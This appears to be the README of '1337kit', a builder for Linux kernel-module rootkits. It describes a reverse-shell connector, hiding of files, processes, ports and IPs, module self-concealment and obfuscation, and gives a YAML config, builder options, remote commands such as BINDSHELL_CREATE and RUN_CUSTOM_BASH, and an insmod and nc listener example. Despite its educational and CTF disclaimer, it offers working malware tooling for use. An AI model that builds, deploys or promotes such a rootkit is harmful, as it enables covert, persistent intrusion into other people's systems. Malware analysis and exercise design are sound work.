1337kit - LKM Rootkit Builder

About project

1337kit is 64-bit LKM Rootkit builder based on yaml prescription

Fully tested on: Linux 5.11.0-34-generic 20.04.1-Ubuntu x86_64 x86_64 x86_64 GNU/Linux

DISCLAIMER: FOR EDUCATIONAL AND INFORMATIONAL PURPOSES ONLY

This project is for malware analysts and for creator of CTF or cyber security exercises, with this builder you can build your custom rootkit for your exercise

I do not take any responsibility for usage of this project

Rootkit Features

• RevShell based connector
• Hiding dents (files, files prefixes, process ids)
• Hiding connections based on Ports in TCP Connection (IPv4 and IPv6)
• Hiding connections based on IP in TCP Connection (IPv4)
• Hiding connections based on Ports in UDP Connection (IPv4 and IPv6)
• Hiding connections based on IP in UDP Connection (IPv4)
• Spawning scripts to user-space
• Hiding module from module list

Builder Features

• Files and functions obfuscation
• Strings encryption
• Verbose building

Installation

Builder requirements:

$ pip3 install -r requirements.txt

Install requirements for building LKM:

sudo apt-get install build-essential linux-headers-$(uname -r)

Usage

You have to create your yaml prescription for custom rootkit, Example of full prescription (every option can be omitted):

hideme: true
connector:
    ip: "127.0.0.1"
    port: "8080"
hide_dent: # Here you can put all your files, directories and process id you want to hide from user
    - "91746"
    - "1337test_"
hide_tcp_port:
    - "8080"
    - "1337"
hide_tcp_ip:
    - "127.0.0.1"
    - "8.8.8.8"
hide_udp_port:
    - "8080"
    - "1337"
hide_udp_ip:
    - "127.0.0.1"
    - "8.8.8.8"
shells:
    - "sleep 1000"

After you create your yaml just run the builder.py

$ python3 builder.py --help
usage: builder.py [-h] -c CONFIG [-v] [-o] [-s]

Generate rootkit from yaml prescription

optional arguments:
  -h, --help            show this help message and exit
  -c CONFIG, --config CONFIG
                        Yaml prescription file
  -v, --verbose         Debug Mode
  -o, --obfuscate_files
                        Enable rootkit symbols obfuscation
  -s, --obfuscate_strings
                        Enable rootkit strings obfuscation

And rootkit will be created.

another way to execute your hiding or shell script is connector, if you enable your connector, rev-sell connection is created to your defined IP and Port, after this it will try open connection every x second. After connection is opened multiple commands can be send:

• HIDEME
• SHOWME
• HIDE_DENT
• SHOW_HIDDEN_DENT
• HIDE_TCP_PORT
• SHOW_HIDDEN_TCP_PORT
• HIDE_TCP_IP
• SHOW_HIDDEN_TCP_IP
• HIDE_UDP_PORT
• SHOW_HIDDEN_UDP_PORT
• HIDE_UDP_IP
• SHOW_HIDDEN_UDP_IP
• BINDSHELL_CREATE
• RUN_CUSTOM_BASH

Additional Information

tcp_seq_show.c file in hooker is pretty much same as udp_seq_show, but i split it if anyone need some own modification for either of protocols

Future Features

• TCP and UDP IPv6 hiding
• AES Encryption support

Examples

$ python3 builder.py --config testfiles/config.yml
$ sudo insmod project.ko
$ nc -lvnp 1337
 Listening on 0.0.0.0 8080
 Connection received on 127.0.0.1 39040
 RUN_CUSTOM_BASH sleep 1000